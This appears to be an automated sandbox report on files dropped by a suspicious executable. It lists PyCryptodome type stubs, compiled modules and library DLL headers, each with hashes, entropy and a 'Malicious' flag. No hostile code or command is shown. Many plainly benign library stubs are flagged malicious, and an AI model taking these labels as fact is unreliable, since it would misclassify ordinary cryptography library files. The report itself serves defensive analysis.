                                                                                                                                            Preview:from typing import Optional, Callable, TypedDict..from typing_extensions import NotRequired....class PbesError(ValueError):.. .......class PBES1(object):.. @staticmethod.. def decrypt(data: bytes, passphrase: bytes) -> bytes: .......class ProtParams(TypedDict):.. iteration_count: NotRequired[int].. salt_size: NotRequired[int].. block_size: NotRequired[int].. parallelization: NotRequired[int]....class PBES2(object):.. @staticmethod.. def encrypt(data: bytes,.. passphrase: bytes,.. protection: str,.. prot_params: Optional[ProtParams] = ...,.. randfunc: Optional[Callable[[int],bytes]] = ...) -> bytes: ....... @staticmethod.. def decrypt(data:bytes, passphrase: bytes) -> bytes: .....

                                                                                                                                            C:\Users\user\AppData\Local\Temp\RarSFX0\lib\Cryptodome\Math\Numbers.pyi

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exe
                                                                                                                                            File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):88
                                                                                                                                            Entropy (8bit):4.462417333166609
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:3:1mMyErOsLmL3VosL1ydxFo+CsaCAX7y:1kmL+fW4CAe
                                                                                                                                            MD5:E7E9C2906D778296EE3697954FE42DBF
                                                                                                                                            SHA1:C264743278627EB4EEC6DCB528C2A274C4C1EA4F
                                                                                                                                            SHA-256:36E3014B15693406377C64FBC0E58407E6419A3FF10816F1FC5961DA545ED142
                                                                                                                                            SHA-512:D2A0D38B85C8F52E839F8146B8EF6CAC086BEE7C06733BE60B61C549BC2C652D9EEA5399781BD3E9D0B7DF0D8A5F931837868614226540B9CA90EEDD016C972A
                                                                                                                                            Malicious:true
                                                                                                                                            Preview:from Cryptodome.Math._IntegerBase import IntegerBase as Integer..__all__ = ['Integer']..

                                                                                                                                            C:\Users\user\AppData\Local\Temp\RarSFX0\lib\Cryptodome\Math\Primality.pyi

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exe
                                                                                                                                            File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):841
                                                                                                                                            Entropy (8bit):4.5810465816498
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:24:1REqa50Kg2G2+kEgR8WSgEgRnxDNaVSYnblDNaj:wCKzG2+NgVSBgZxDQVrRDQj
                                                                                                                                            MD5:A3ADEC74F909A4E9CFB74C5EFFD5162D
                                                                                                                                            SHA1:4325C3C9FD0FDA73843197C2B99E55C5DCACDFE4
                                                                                                                                            SHA-256:F73DAEA86E4577FDE3B6E314A1DA38441A8F0CA8AC64A018821E10706B80C903
                                                                                                                                            SHA-512:F0A41213290CA4D46C1A012D8FBF38B3E16D05D61BF815634EC587B03644F707D5726BFB264AE504BFB4A070210A2CCE1898B25A0697504C6B557D06BF7B2894
                                                                                                                                            Malicious:true
                                                                                                                                            Preview:from typing import Callable, Optional, Union, Set....PrimeResult = int....COMPOSITE: PrimeResult..PROBABLY_PRIME: PrimeResult....def miller_rabin_test(candidate: int, iterations: int, randfunc: Optional[Callable[[int],bytes]]=None) -> PrimeResult: .....def lucas_test(candidate: int) -> PrimeResult: ....._sieve_base: Set[int]..def test_probable_prime(candidate: int, randfunc: Optional[Callable[[int],bytes]]=None) -> PrimeResult: .....def generate_probable_prime(*,.. exact_bits: int = ...,.. randfunc: Callable[[int],bytes] = ...,.. prime_filter: Callable[[int],bool] = ...) -> int: .....def generate_probable_safe_prime(*,.. exact_bits: int = ...,.. randfunc: Callable[[int],bytes] = ...) -> int: .....

                                                                                                                                            C:\Users\user\AppData\Local\Temp\RarSFX0\lib\Cryptodome\Math\_IntegerBase.pyi

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exe
                                                                                                                                            File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):3810
                                                                                                                                            Entropy (8bit):4.6872218402303165
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:24:1REjiTAaR+gZ2KDRSjmnV69RuezESHcAFPS+ep0npIk/6I3ZuieIeKvJK5fCKsLm:giTnXDojmW8ABwi+M30W85fzsLm
                                                                                                                                            MD5:00C57D206A1CD7FC853656AF026AEC7E
                                                                                                                                            SHA1:0C3FDC977E7AE71D989B208A61DB93C66601177E
                                                                                                                                            SHA-256:C8A26AFF672F06B9C4D80286E0EF8DDE8B2B41FF4C317AB75ACA0FD0D01C751E
                                                                                                                                            SHA-512:74ECC9628812D52785545D3C5304AD5735C8D6C484C389B46F5D61AFCB339F136931C9A7A7759A6656028277B16ED6C21475F2E741B466516A9CA95BA5F61773
                                                                                                                                            Malicious:true
                                                                                                                                            Preview:from typing import Optional, Union, Callable....RandFunc = Callable[[int],int]....class IntegerBase:.... def __init__(self, value: Union[IntegerBase, int]): ....... def __int__(self) -> int: ..... def __str__(self) -> str: ..... def __repr__(self) -> str: ..... def to_bytes(self, block_size: Optional[int]=0, byteorder: str= ...) -> bytes: ..... @staticmethod.. def from_bytes(byte_string: bytes, byteorder: Optional[str] = ...) -> IntegerBase: ..... def __eq__(self, term: object) -> bool: ..... def __ne__(self, term: object) -> bool: ..... def __lt__(self, term: Union[IntegerBase, int]) -> bool: ..... def __le__(self, term: Union[IntegerBase, int]) -> bool: ..... def __gt__(self, term: Union[IntegerBase, int]) -> bool: ..... def __ge__(self, term: Union[IntegerBase, int]) -> bool: ..... def __nonzero__(self) -> bool: ..... def is_negative(self) -> bool: ..... def __add__(self, term: Union[IntegerBase, int]) -> IntegerBase: ..... def __su

                                                                                                                                            C:\Users\user\AppData\Local\Temp\RarSFX0\lib\Cryptodome\Math\_IntegerCustom.pyi

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exe
                                                                                                                                            File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):143
                                                                                                                                            Entropy (8bit):4.509027321360697
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:3:1REvgBFovSL67L3XBVHa3VCfoovjeQACyWOAXUhvvn:1REYBFovSLwXBbfoyjlAqOAENv
                                                                                                                                            MD5:454B6FB1C6C3822CE064ED36C4C54D6E
                                                                                                                                            SHA1:3FCBB34C384AFEA58ECB58831F98A6AC2F22AAF9
                                                                                                                                            SHA-256:BAF20195FDB64EFAB526FE676151CE94716DCE7EF897EDFBF92BC744E53AECFD
                                                                                                                                            SHA-512:3505C80ED654D06FFBBA906455826D23CBC1C31798104762B0C116761037332E8197ED12E3ED92101E35A8F7CFCEF53BE887C80A0AF0B36BFFCC482B95F60750
                                                                                                                                            Malicious:true
                                                                                                                                            Preview:from typing import Any....from ._IntegerNative import IntegerNative...._raw_montgomery = Any....class IntegerCustom(IntegerNative):.. pass..

                                                                                                                                            C:\Users\user\AppData\Local\Temp\RarSFX0\lib\Cryptodome\Math\_IntegerGMP.pyi

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exe
                                                                                                                                            File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):81
                                                                                                                                            Entropy (8bit):4.306529623636421
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:3:1L67L3VFGJeQACyoOXZohvvn:1LymJlAPmNv
                                                                                                                                            MD5:1B3750794FA1C99B19798392A644DD26
                                                                                                                                            SHA1:1449A147E2608AE5A6C9AFD5090E62992B39CAF7
                                                                                                                                            SHA-256:32D4D0B0B2FD179F5DFD1A04C22A2D3FD4D178D5C7645ECF15754FC073C7E508
                                                                                                                                            SHA-512:1ABCA6FB4ED46759D6BA04AB76F302AB9E3C14813F319295AAFAE68C91CFB3E197894916D8C9D464B35D5E14741E159CAC64166F30A0A05FF5BC9A3158D783FB
                                                                                                                                            Malicious:true
                                                                                                                                            Preview:from ._IntegerBase import IntegerBase..class IntegerGMP(IntegerBase):.. pass..

                                                                                                                                            C:\Users\user\AppData\Local\Temp\RarSFX0\lib\Cryptodome\Math\_IntegerNative.pyi

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exe
                                                                                                                                            File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):84
                                                                                                                                            Entropy (8bit):4.2558290658438995
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:3:1L67L3VFGJeQACyPLRAXZohvvn:1LymJlATLKmNv
                                                                                                                                            MD5:5629E6B58552EE91D828CFF9CA49219A
                                                                                                                                            SHA1:CDB1DCA0B7E2E94F5393A861422C1C38D4472763
                                                                                                                                            SHA-256:CA1DD04ECAC1474B1FBDAD15AB86881FB10E182A32C3AEB88C3F9F1B468E62E7
                                                                                                                                            SHA-512:074FE60CAE14932319C5C6174D10F7E77594AAA40FAE192D8B16098C867C010A756193163DA74EEA235FF46781A8FE68C257A5AB456D6F063A4A261813D352E5
                                                                                                                                            Malicious:true
                                                                                                                                            Preview:from ._IntegerBase import IntegerBase..class IntegerNative(IntegerBase):.. pass..

                                                                                                                                            C:\Users\user\AppData\Local\Temp\RarSFX0\lib\Cryptodome\Math\_modexp.pyd

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exe
                                                                                                                                            File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):35840
                                                                                                                                            Entropy (8bit):5.927928056434685
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:768:KbEkzS7+k9rMUb8cOe9rs9ja+V/Mhxh56GS:KbEP779rMtcOCs0I/Mjf
                                                                                                                                            MD5:732938D696EB507AF4C37795A4F9FCEA
                                                                                                                                            SHA1:FD585EA8779C305ADBE3574BE95CFD06C9BBD01C
                                                                                                                                            SHA-256:1383269169AB4D2312C52BF944BD5BB80A36D378FD634D7C1B8C3E1FFC0F0A8C
                                                                                                                                            SHA-512:E4EBC5470F3D05D79B65BC2752A7FF40F5525CD0813BDDECCB1042EE2286B733EE172383186E89361A49CBE0B4B14F8B2CBC0F32E475101385C634120BB36676
                                                                                                                                            Malicious:true
                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......N4.|.U./.U./.U./.-a/.U./.*...U./A-...U./.U./!U./.*...U./.*...U./.*...U./0....U./0....U./0../.U./0....U./Rich.U./................PE..d...S..e.........." ...%.^...0......`.....................................................`..........................................~..|...\...d...............................,....s...............................q..@............p..(............................text...8].......^.................. ..`.rdata.......p.......b..............@..@.data................v..............@....pdata..............................@..@.rsrc...............................@..@.reloc..,...........................@..B................................................................................................................................................................................................................................................

                                                                                                                                            C:\Users\user\AppData\Local\Temp\RarSFX0\lib\Cryptodome\Protocol\DH.pyi

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exe
                                                                                                                                            File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):486
                                                                                                                                            Entropy (8bit):5.103633548794261
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:12:1REYB9mNRE1BgSk+wCw+cKl1J/5NcpN9NVSyoGyv:1REuyC1Ri9gvC/gyfyv
                                                                                                                                            MD5:5980C3F8EC7B458E12435B33990F1CD7
                                                                                                                                            SHA1:5EA592FFCC6973CB43889FAD251B9A0660C91422
                                                                                                                                            SHA-256:202B6EC016DA2A6C45BBAE6AC3A458CEBAE34BFDC86041FC812B73F00AACB63B
                                                                                                                                            SHA-512:5702D9BB3A55CEAF98D1FFD93CC853919C66C1B2B52D4983E6E8D1108394F041EA3F05B36BA7145FF48021CA45FC53F6FBBB51E47D92CAB59450A6318F959227
                                                                                                                                            Malicious:true
                                                                                                                                            Preview:from typing import TypedDict, Callable, TypeVar, Generic..from typing_extensions import Unpack, NotRequired....from Cryptodome.PublicKey.ECC import EccKey....T = TypeVar('T')....class RequestParams(TypedDict, Generic[T]):.. kdf: Callable[[bytes|bytearray|memoryview], T].. static_priv: NotRequired[EccKey].. static_pub: NotRequired[EccKey].. eph_priv: NotRequired[EccKey].. eph_pub: NotRequired[EccKey]....def key_agreement(**kwargs: Unpack[RequestParams[T]]) -> T: .....

                                                                                                                                            C:\Users\user\AppData\Local\Temp\RarSFX0\lib\Cryptodome\Protocol\KDF.pyc

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exe
                                                                                                                                            File Type:data
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):30124
                                                                                                                                            Entropy (8bit):5.514741717165847
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:768:tz2eo574yVIx6d9zOs/lzDRzT1XzxQHJ56zEe:twB9JzOMzt1DxQJk
                                                                                                                                            MD5:BE26E6E3AEBA928CC8D6CE4D32504FB8
                                                                                                                                            SHA1:5D463F36838FB25C25938520899E1BBD3525A9E2
                                                                                                                                            SHA-256:95CB324C723755404D62AE63AFC37ECEAD0667CDFFFC959CB4898243AE392F4D
                                                                                                                                            SHA-512:BD267B60A9F02F3E681D4BB5F29C5A00F3468AFFCA50B90F91BD9859684DF7E6225C1F11B348B47658457186371F46AC860ED1CA8EF7C17B65C4103C976966D5
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:...........e.Y........................:.....d.d.l.Z.d.d.l.Z.d.d.l.m.Z...d.d.l.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z...d.d.l.m.Z.m.Z.m.Z.m.Z.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z.m.Z.m.Z...d.d.l.m.Z.m.Z.m.Z.m.Z.....e.d.d...............Z ..e.d.d...............Z!d.d...Z"d.d...Z#..G.d...d.e$..............Z%d.d...Z&d d...Z'd...Z(d...Z)d...Z*d!d...Z+d...Z,d"d...Z-d.S.)#.....N)...reduce)...tobytes..bord.._copy_bytes..iter_range..tostr..bchr..bstr)...SHA1..SHA256..HMAC..CMAC..BLAKE2s)...strxor)...get_random_bytes)...size..long_to_bytes..bytes_to_long)...load_pycryptodome_raw_lib..create_string_buffer..get_raw_buffer..c_size_tz.Cryptodome.Cipher._Salsa20z.. int Salsa20_8_core(const uint8_t *x, const uint8_t *y,. uint8_t *out);. z.Cryptodome.Protocol._scrypta..... typedef int (core_t)(const uint8_t [64], const uint8_t [64], uint8_t [64]);. int scryptROMix(const uint8_t *data_in, uint8_t *dat

                                                                                                                                            C:\Users\user\AppData\Local\Temp\RarSFX0\lib\Cryptodome\Protocol\KDF.pyi

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exe
                                                                                                                                            File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):2038
                                                                                                                                            Entropy (8bit):4.91503915615325
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:48:ccWF4ZIA4B0Aq3myAjhANxt9z5RJx6Rgmqd:ccWFgR42Aq3myANAPz5RJURgmQ
                                                                                                                                            MD5:1687A469EDFFF0FFDAA2B11B36773D3E
                                                                                                                                            SHA1:33C8FB6F81ACDB5D4269C3B71B4357A75D3717DA
                                                                                                                                            SHA-256:B131B886A651ED555E85ED9776332A77826C1EECF002D077573CCB3B6E410F8D
                                                                                                                                            SHA-512:40EB0A8B520F945357B26CFD09DB469AD54CA21DB0E322D4932DF12570EB23D80920C4B9BC017DDDC241A3FC1F9BA5E41607629ECEB09C59F39B8BCFBCF4D0CA
                                                                                                                                            Malicious:true
                                                                                                                                            Preview:from types import ModuleType..from typing import Optional, Callable, Tuple, Union, Dict, Any, overload..from typing_extensions import Literal....Buffer=bytes|bytearray|memoryview....RNG = Callable[[int], bytes]..PRF = Callable[[bytes, bytes], bytes]....def PBKDF1(password: str, salt: bytes, dkLen: int, count: Optional[int]=1000, hashAlgo: Optional[ModuleType]=None) -> bytes: .....def PBKDF2(password: str, salt: bytes, dkLen: Optional[int]=16, count: Optional[int]=1000, prf: Optional[RNG]=None, hmac_hash_module: Optional[ModuleType]=None) -> bytes: .......class _S2V(object):.. def __init__(self, key: bytes, ciphermod: ModuleType, cipher_params: Optional[Dict[Any, Any]]=None) -> None: ....... @staticmethod.. def new(key: bytes, ciphermod: ModuleType) -> None: ..... def update(self, item: bytes) -> None: ..... def derive(self) -> bytes: .......def HKDF(master: bytes, key_len: int, salt: bytes, hashmod: ModuleType, num_keys: Optional[int]=1, context: Optional[bytes]=None) ->

                                                                                                                                            C:\Users\user\AppData\Local\Temp\RarSFX0\lib\Cryptodome\Protocol\SecretSharing.pyi

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exe
                                                                                                                                            File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):820
                                                                                                                                            Entropy (8bit):4.725635475246741
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:24:1RElqMAWKVAATGujmo2Iu9DSjYlQTKUajh2FK4AghCN:XMom87jm5Uaj54zY
                                                                                                                                            MD5:2C29B85AA1A7948F90DCFD8358D8E6B4
                                                                                                                                            SHA1:A3915B73FF0D5551F611428FEDB436617E35B93F
                                                                                                                                            SHA-256:17BB4B071A5BAAB986780546A7B0F506F186A683CB2A2A9C9C3B727C3D9C0921
                                                                                                                                            SHA-512:665A60174EC4D827D95F11F2B88229E943EFF1C2C60F463DD710546970261FE8D8BBF2B527AA82ECB18F25BB1310ED11AFFE8997EC997DEA6D04D4A908EF96C4
                                                                                                                                            Malicious:true
                                                                                                                                            Preview:from typing import Union, List, Tuple, Optional....def _mult_gf2(f1: int, f2: int) -> int : .....def _div_gf2(a: int, b: int) -> int : .......class _Element(object):.. irr_poly: int.. def __init__(self, encoded_value: Union[int, bytes]) -> None: ..... def __eq__(self, other) -> bool: ..... def __int__(self) -> int: ..... def encode(self) -> bytes: ..... def __mul__(self, factor: int) -> _Element: ..... def __add__(self, term: _Element) -> _Element: ..... def inverse(self) -> _Element: ..... def __pow__(self, exponent) -> _Element: .......class Shamir(object):.. @staticmethod.. def split(k: int, n: int, secret: bytes, ssss: Optional[bool]) -> List[Tuple[int, bytes]]: ..... @staticmethod.. def combine(shares: List[Tuple[int, bytes]], ssss: Optional[bool]) -> bytes: .......

                                                                                                                                            C:\Users\user\AppData\Local\Temp\RarSFX0\lib\Cryptodome\Protocol\__init__.pyc

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exe
                                                                                                                                            File Type:data
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):268
                                                                                                                                            Entropy (8bit):5.238230527003181
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:6:7bvQl+KY+ZFZ6+ne+u95/n23d6p9ArMJcrLQIaCkkrVXyit:7bvw+WZX6+ng/2IphJgdankrty2
                                                                                                                                            MD5:12B3E0F117CBF1AFB3D5C42CB242955E
                                                                                                                                            SHA1:E0119D20C8891269EDAB3D6A7650ED06F737A5ED
                                                                                                                                            SHA-256:07AC75B6D10055E75786F062B67AD5EDDF73E79B53EC57B8423BE710452A2846
                                                                                                                                            SHA-512:DABD1F29CBBC43DEDAD0028E2B3F07E47D65F6F0199354D4578F515F085081EFE9BC4E04E2CF414CA2C3FFB885904CA05CBFBB36A1EB93BB6E3F3F4864F8C2ED
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:...........e1...............................g.d...Z.d.S.).)...KDF..SecretSharing..DHN)...__all__........pC:\Users\Administrator\AppData\Local\Programs\Python\Python311\Lib\site-packages\Cryptodome\Protocol\__init__.py..<module>r........s..........>..)..(..(......r....

                                                                                                                                            C:\Users\user\AppData\Local\Temp\RarSFX0\lib\Cryptodome\Protocol\__init__.pyi

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exe
                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):44
                                                                                                                                            Entropy (8bit):4.516027641266231
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:3:UFo+Cu1KvCGQQN+Zen:U9uCGQY+Zen
                                                                                                                                            MD5:4200283AFF0E859DE9F1C15EBAD7A073
                                                                                                                                            SHA1:42B5DC005A804C92E877D93FB14FDB41E52C6C7A
                                                                                                                                            SHA-256:D17FF2840E82E8BDF3FC2378B27B824FE0C97506473295746C18253407FDA61B
                                                                                                                                            SHA-512:A4CC0C1A5F215A9E422DF2DF80086E39767ADB2D6D2DA0E086FED921D087847664CCD3D9F7170834E2DCE8B4C07F71422CA0BB962627D4A1CFAFF0E6621FD383
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:__all__ = ['KDF.pyi', 'SecretSharing.pyi']..

                                                                                                                                            C:\Users\user\AppData\Local\Temp\RarSFX0\lib\Cryptodome\Protocol\_scrypt.pyd

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exe
                                                                                                                                            File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):12288
                                                                                                                                            Entropy (8bit):4.799297116284292
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:192:UkCfXASTMeAk4OepIXcADpOX6RcqgO5vE:+JMcPepIXcADq63gO5vE
                                                                                                                                            MD5:9E7B28D6AB7280BBB386C93EF490A7C1
                                                                                                                                            SHA1:B088F65F3F6E2B7D07DDBE86C991CCD33535EF09
                                                                                                                                            SHA-256:F84667B64D9BE1BCC6A91650ABCEE53ADF1634C02A8A4A8A72D8A772432C31E4
                                                                                                                                            SHA-512:16A6510B403BF7D9ED76A654D8C7E6A0C489B5D856C231D12296C9746AC51CD372CC60CA2B710606613F7BC056A588C54EA24F9C0DA3020BBEA43E43CEEB9CA4
                                                                                                                                            Malicious:true
                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........K...*...*...*...RQ..*...U...*..R...*...*...*...U...*...U...*...U...*......*......*...=..*......*..Rich.*..................PE..d...P..e.........." ...%............P.....................................................`..........................................8..d...$9..d....`.......P..4............p..,....3...............................1..@............0...............................text...x........................... ..`.rdata.......0......................@..@.data........@.......&..............@....pdata..4....P.......(..............@..@.rsrc........`.......,..............@..@.reloc..,....p......................@..B................................................................................................................................................................................................................................................

                                                                                                                                            C:\Users\user\AppData\Local\Temp\RarSFX0\lib\Cryptodome\PublicKey\DSA.pyi

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exe
                                                                                                                                            File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):1412
                                                                                                                                            Entropy (8bit):4.9317569017679235
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:24:1RECbuLosANpNAEGjm53s+MAHUpSm+CHZJHPaHzy3:ryEsuj5Gjm2+NHUpGuJiTy3
                                                                                                                                            MD5:299FE26EFF86811A83759B29485B17D7
                                                                                                                                            SHA1:308EF3564AB7D637AA3F00747618AB8D625B09F4
                                                                                                                                            SHA-256:7E2D92CC91313869FFB9ACBDE0F4628F6BB9995FF154BCC0E8C2F1F733E96C4F
                                                                                                                                            SHA-512:785B0A5D31BC45D4FE2580B26F09A45EFB9FB6244115AB973F4BE65D98A63A49504330553B758672638529082DA1809A541F9AD5EFDF774AA51F9DD2F8A301AF
                                                                                                                                            Malicious:true
                                                                                                                                            Preview:from typing import Dict, Tuple, Callable, Union, Optional....__all__ = ['generate', 'construct', 'DsaKey', 'import_key' ]....RNG = Callable[[int], bytes]....class DsaKey(object):.. def __init__(self, key_dict: Dict[str, int]) -> None: ..... def has_private(self) -> bool: ..... def can_encrypt(self) -> bool: ... # legacy.. def can_sign(self) -> bool: ... # legacy.. def public_key(self) -> DsaKey: ..... def __eq__(self, other: object) -> bool: ..... def __ne__(self, other: object) -> bool: ..... def __getstate__(self) -> None: ..... def domain(self) -> Tuple[int, int, int]: ..... def __repr__(self) -> str: ..... def __getattr__(self, item: str) -> int: ..... def export_key(self, format: Optional[str]="PEM", pkcs8: Optional[bool]=None, passphrase: Optional[str]=None,.. protection: Optional[str]=None, randfunc: Optional[RNG]=None) -> bytes: ..... # Backward-compatibility.. exportKey = export_key.. publickey = public_key....

                                                                                                                                            C:\Users\user\AppData\Local\Temp\RarSFX0\lib\Cryptodome\PublicKey\ECC.pyi

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exe
                                                                                                                                            File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):3376
                                                                                                                                            Entropy (8bit):4.625212866548323
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:48:PjOqAjRO1YZB84jmtD70lAklkqqN1VZcjmRwmuWzXndSnVSOrEuQASxXSs:7OqAjR58Kk1VZFGK0SOrTQASxCs
                                                                                                                                            MD5:D94B6490D5A802C1BA16AA40217DE10C
                                                                                                                                            SHA1:23C21109A19A22DF4A73D591CF782241DCEB8645
                                                                                                                                            SHA-256:CBB1A6B7364BEBAEAF5D18025871220795E39F007BD8C57429A3520E3AD3ED86
                                                                                                                                            SHA-512:3B10F2B0D7A2A2E90346F88194C4B50906EA6944014B22CEDD2B29D0BE5F5D1C4D8FD5B868B7FB063693E27F8B9715FCC3243B43A90B76B99B9E1D6681176C17
                                                                                                                                            Malicious:true
                                                                                                                                            Preview:from __future__ import annotations....from typing import Union, Callable, Optional, Tuple, Dict, NamedTuple, Any, overload, Literal..from typing_extensions import TypedDict, Unpack, NotRequired....from Cryptodome.Math.Numbers import Integer..from Cryptodome.IO._PBES import ProtParams....RNG = Callable[[int], bytes]......class UnsupportedEccFeature(ValueError):.. .........class EccPoint(object):.. def __init__(self,.. x: Union[int, Integer],.. y: Union[int, Integer],.. curve: Optional[str] = ...) -> None: ....... def set(self, point: EccPoint) -> EccPoint: ..... def __eq__(self, point: object) -> bool: ..... def __neg__(self) -> EccPoint: ..... def copy(self) -> EccPoint: ..... def is_point_at_infinity(self) -> bool: ..... def point_at_infinity(self) -> EccPoint: ..... @property.. def x(self) -> int: ..... @property.. def y(self) -> int: ..... @property.. def xy(self) -> Tuple[int, int]: ..... d

                                                                                                                                            C:\Users\user\AppData\Local\Temp\RarSFX0\lib\Cryptodome\PublicKey\ElGamal.pyi

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exe
                                                                                                                                            File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):692
                                                                                                                                            Entropy (8bit):4.899620335781504
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:12:1REYB1ukDAxL+aB7yGerrkjjAo1AiiiNpyEVybjJjm53s+c:1REquJL+pPjsAANAE8bVjm53s+c
                                                                                                                                            MD5:BB6DFCDEB98EA22FCAFD1C2EF2909FD1
                                                                                                                                            SHA1:95BB59D50EEB6EC2FF53AA07FE9C7291C628F1AA
                                                                                                                                            SHA-256:701C7CA660A0ECBF8B633FBB1A080F447FC693E128965D369C6165F621CD80B6
                                                                                                                                            SHA-512:D22A616317C9F8043C65E32B7D3516E6E7A73A03412151FF26BD09F0DF60F53E6E02FB2FD7F71F48E0C17DA0377156A1AAA7FE4843E72D9AF184A95CEA4C82A7
                                                                                                                                            Malicious:true
                                                                                                                                            Preview:from typing import Callable, Union, Tuple, Optional....__all__ = ['generate', 'construct', 'ElGamalKey']....RNG = Callable[[int], bytes]....def generate(bits: int, randfunc: RNG) -> ElGamalKey: .....def construct(tup: Union[Tuple[int, int, int], Tuple[int, int, int, int]]) -> ElGamalKey: .......class ElGamalKey(object):.. def __init__(self, randfunc: Optional[RNG]=None) -> None: ..... def has_private(self) -> bool: ..... def can_encrypt(self) -> bool: ..... def can_sign(self) -> bool: ..... def publickey(self) -> ElGamalKey: ..... def __eq__(self, other: object) -> bool: ..... def __ne__(self, other: object) -> bool: ..... def __getstate__(self) -> None: .....

                                                                                                                                            C:\Users\user\AppData\Local\Temp\RarSFX0\lib\Cryptodome\PublicKey\RSA.pyi

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exe
                                                                                                                                            File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):2607
                                                                                                                                            Entropy (8bit):4.575395743505381
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:24:1REquT4jR0wWsAInlNAE+jm53s+eZNcN4n6Rs9Y+CMKoUDT+YsUVRVxzL3:BjR05sX5+jm2+eDqszdPUDXVHVL3
                                                                                                                                            MD5:E220BF1537EBCDCDD7FED112B709B1BD
                                                                                                                                            SHA1:3E483A9CC935CFE5FDC053A27B65C4690C5BA41E
                                                                                                                                            SHA-256:FED5301843FADDB9262E17DF269746D55B9A594E26B736DE9C493731ABA319D5
